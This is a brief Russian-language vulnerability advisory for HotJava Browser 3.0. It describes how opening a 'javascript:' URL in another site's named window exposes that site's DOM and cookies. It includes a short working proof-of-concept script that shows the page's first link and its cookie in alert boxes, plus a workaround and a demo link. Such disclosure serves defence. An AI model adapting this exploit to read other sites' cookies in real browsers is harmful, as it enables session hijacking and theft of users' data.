Обнаружена уязвимость в HotJava Browser 3.0, которая дает доступ к DOM программным кодам. Помимо всего прочего, это позволяет воровать cookies других посещенных сайтов.
Системы уязвимы:
HotJava Browser 3.0
Проблема имеет отношение к открытию ' javascript: ' URL в окне, которое позволяет обращаться к DOM документа в этом окне.
Эксплоит:
---------hotjava-1.html------------------------------------------
<SCRIPT>
window.open("http://www.sun.com","g");
setTimeout("window.open('javascript:alert(\"The first link is:
\"+document.links[0].href);alert(\"The cookie is:
\"+document.cookie)','g')",10000);
</SCRIPT>
---------------------------------------------------------------------
Фиксим:
Выруби поддержку JavaScript
Демонстрация:
http://www.guninski.com/hotjava-1.html